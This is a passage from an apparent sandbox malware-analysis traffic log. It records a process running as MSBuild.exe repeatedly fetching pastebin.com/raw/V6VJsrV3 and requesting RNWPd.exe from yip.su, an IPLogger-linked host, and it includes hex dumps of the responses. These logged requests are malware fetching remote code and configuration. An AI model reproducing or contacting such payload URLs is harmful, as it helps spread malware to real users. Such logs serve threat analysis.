7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
2024-09-16 19:23:35 UTC	1369	IN	Data Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
2024-09-16 19:23:35 UTC	1369	IN	Data Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
2024-09-16 19:23:35 UTC	156	IN	Data Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:23:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	49791	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:40 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:23:40 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433b7beda07cea-EWR
2024-09-16 19:23:40 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:23:40 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:23:40 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:23:40 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:23:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	49792	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:41 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:23:41 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:23:41 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:23:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2FS7bD2ujgZhtzh1lLl1l5jkg9e1eRzLMXjsOANplb1Tp1ZHd3Kq4777GSV81e7fEp5wffgzbbskMZX0s6Q3XsNJMCXZvWLL7bjyj5cdYfQ%2FAAi0IJW4vQI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433b7fdc8a43b6-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:23:41 UTC	471	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:23:41 UTC	1369	IN	Data Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
2024-09-16 19:23:41 UTC	1369	IN	Data Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
2024-09-16 19:23:41 UTC	1369	IN	Data Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
2024-09-16 19:23:41 UTC	1369	IN	Data Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
2024-09-16 19:23:41 UTC	1369	IN	Data Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
2024-09-16 19:23:41 UTC	154	IN	Data Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:23:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	49793	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:46 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:23:46 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433ba00f874265-EWR
2024-09-16 19:23:46 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:23:46 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:23:46 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:23:46 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:23:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	49795	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:52 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:23:52 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433bc488774407-EWR
